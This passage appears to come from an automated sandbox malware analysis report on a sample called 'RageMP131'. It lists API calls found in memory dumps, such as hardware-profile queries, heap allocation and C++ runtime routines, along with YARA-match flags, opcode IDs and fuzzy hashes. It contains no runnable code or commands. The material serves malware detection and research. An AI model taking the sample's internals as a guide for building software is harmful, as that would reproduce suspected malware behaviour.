                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 8d882ae05e53a93e8af5db0b1f4d9ddee17e335f54e79af328b0f1a4f70f8330
                                      • Instruction ID: 9b036b2b8da0ac5d8becef351c9a640111f55e56fd01a683b93dcfe4508480f0
                                      • Opcode Fuzzy Hash: 8d882ae05e53a93e8af5db0b1f4d9ddee17e335f54e79af328b0f1a4f70f8330
                                      • Instruction Fuzzy Hash: CB118E7360821036C72522346826BFE2B8B9FD3734F75021DF9048F2D2DE218CC14359
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,006EF970,0069B2D2,00000002,0069B2D2,00000000,?,?,?,006AAE86,00000000,?,0069B2D2,00000002,006EF970), ref: 006AADB8
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 04c38c70e5e67996e03a20c4a0605a86f723672adecb9b72a863cfaa4d375e45
                                      • Instruction ID: 22849b9dec336940aed7c9a5c756e11445a32ece5833b289634cddd7e15a65c2
                                      • Opcode Fuzzy Hash: 04c38c70e5e67996e03a20c4a0605a86f723672adecb9b72a863cfaa4d375e45
                                      • Instruction Fuzzy Hash: 4B010432614245AFCF09AF58DC059DE3B6BDF82320B240249E8519B290EB71DD52CF90
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 7d22168d2f2a84b1a1836686e0e63e57143390d46369afeff20e09c7d628d07a
                                      • Instruction ID: 3df155abdc8c67d4fab7743fb3dc98401d8569f0af68254494e8546d90f3ae61
                                      • Opcode Fuzzy Hash: 7d22168d2f2a84b1a1836686e0e63e57143390d46369afeff20e09c7d628d07a
                                      • Instruction Fuzzy Hash: 85F0B4AAB0910AAFB125F0412F5CAF7236DD7DCB3077288B6F887D5400D3944ACA097D
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C1FDE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID:
                                      • API String ID: 2659868963-0
                                      • Opcode ID: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
                                      • Instruction ID: d403e680dad0dac643e662c12a223aaad6f45f1c8de352debb111a33a0deecec
                                      • Opcode Fuzzy Hash: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
                                      • Instruction Fuzzy Hash: 72012B3540460D77CF14AED4EC01999B79EDE02360B50853DF90496951FB70E9908BE9
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 8ffbef9975dc585e75a7fda81dbf89f915230f5409aa3c13edb769c3a09dcc05
                                      • Instruction ID: 01062d9be5a53e14ce583db21b6551f7c88588231005e5686087a153199a4ce1
                                      • Opcode Fuzzy Hash: 8ffbef9975dc585e75a7fda81dbf89f915230f5409aa3c13edb769c3a09dcc05
                                      • Instruction Fuzzy Hash: D9F082A6B1960AAFB126F4452E5CAB7236DD7DC730772C8B6F886D9000D39489C6097C
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,0069A41C,?,?,006B2A99,00000001,00000364,?,00000006,000000FF,?,0069D39B,?,?,?,?), ref: 006B3155
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7792184069740be1e175ed1e216448155741cf0702fb6bca346f68947e4f3b8c
                                      • Instruction ID: 3d5ea5372ab872a793722091d7e54b4688bde702eb3902c59a0625cac5cf3672
                                      • Opcode Fuzzy Hash: 7792184069740be1e175ed1e216448155741cf0702fb6bca346f68947e4f3b8c
                                      • Instruction Fuzzy Hash: 1FF0B471705638669B216A6D4C01BDB374FAF427A0B158015BC0896380CF30DE8147F4
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0069D39B,?,?,?,?,?,005C2D8D,0069A41C,?,?,0069A41C), ref: 006B3B80
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 2b13ca915fdb1a6c380a62cb0ac4430f46034b10ccb13550d74968db2edae58d
                                      • Instruction ID: 44a26996c7d40496956b391cdf2b89e9c02d3823269eca9dc1fa9511170bce6e
                                      • Opcode Fuzzy Hash: 2b13ca915fdb1a6c380a62cb0ac4430f46034b10ccb13550d74968db2edae58d
                                      • Instruction Fuzzy Hash: 68E0EDB13002366AE62036294C00BEB7A4FDFA23B0F150228AC1896385CF60CE8083B8
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0062A143
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0062A165
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0062A185
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0062A1AF
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0062A21D
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0062A269
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0062A283
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0062A318
                                      • std::_Facet_Register.LIBCPMT ref: 0062A325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                      • String ID: bad locale name
                                      • API String ID: 3375549084-1405518554
                                      • Opcode ID: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
                                      • Instruction ID: 4520bb9ea4f2fb13aca0336c54c8218bd6ba6c1c77e2a4e536d750809e56c57a
                                      • Opcode Fuzzy Hash: eb15d4d5a58ccea16f681e38d12e4a124b8eee0357872a2b35296df6f660b822
                                      • Instruction Fuzzy Hash: 1B617BB1D006589BDF50DFE4E849BAEBBF6AF04710F18401DE805A7341EBB5AA05CF96
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 005C37E9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005C3835
                                      • __Getctype.LIBCPMT ref: 005C384E
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 005C386A
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 005C38FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                      • String ID: 0:\$bad locale name
                                      • API String ID: 1840309910-381323209
                                      • Opcode ID: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
                                      • Instruction ID: 85dadb2b629b003dd1c15cde83567e63b6603cd8f7c5dc18547b40831c741856
                                      • Opcode Fuzzy Hash: acc14d78bc263a80ff7a547183b0480491646b17c0cdb51e91707a4aa77ac5b7
                                      • Instruction Fuzzy Hash: D7515DB1D002489FEF10DFE4D945B9EFBF9AF14710F14812DE804AB241E775AA48CB92
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 0069FB67
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0069FB6F
                                      • _ValidateLocalCookies.LIBCMT ref: 0069FBF8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0069FC23
                                      • _ValidateLocalCookies.LIBCMT ref: 0069FC78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
                                      • Instruction ID: c6980bd0654e9df2564edadb583b94701c4113cb8d758c70f22ad7e66554c7f6
                                      • Opcode Fuzzy Hash: 0cfc09b797f0cecec4d15548cb52071775a40f761062f0606ac0848a7e270661
                                      • Instruction Fuzzy Hash: 1541C83190020CDBCF10EF68C894AAEBBAAAF45324F25C069EC14DB752D771ED41CB91
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00628903
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00628926
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00628946
                                      • std::_Facet_Register.LIBCPMT ref: 006289BB
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006289D3
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 006289EB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                      • String ID:
                                      • API String ID: 2081738530-0
                                      • Opcode ID: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
                                      • Instruction ID: c9029f6896445d316dd5a04902b74ce52702629516f2bc47d1272f8ecbd4cb18
                                      • Opcode Fuzzy Hash: e0bdf733a49c3733141872c4db60ba2316449b1d9769f12b21b64271864543ec
                                      • Instruction Fuzzy Hash: 6241DF71D016299FCB10DF98EC41ABABBB6FB04320F144259E9156B751DB30AE84CFD2
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C60F2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C617F
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C6248
                                      Strings
                                      • recursive_directory_iterator::operator++, xrefs: 005C61CC
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy$___std_exception_copy
                                      • String ID: recursive_directory_iterator::operator++
                                      • API String ID: 1206660477-953255998
                                      • Opcode ID: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
                                      • Instruction ID: 08413dfb8df63a52a0f7290efaedbc90f32e6a05fbc46551035d60027a64b002
                                      • Opcode Fuzzy Hash: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
                                      • Instruction Fuzzy Hash: 77E1F4B09006049FDB18DF98D845FAEBBFAFF44300F14461DE456A7B82E774AA44CBA5
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C86DE
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C86ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
